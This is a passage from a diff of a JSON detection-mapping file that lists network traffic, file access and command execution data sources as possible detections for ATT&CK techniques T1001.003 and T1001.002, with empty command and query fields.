"IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1001.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1001.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated 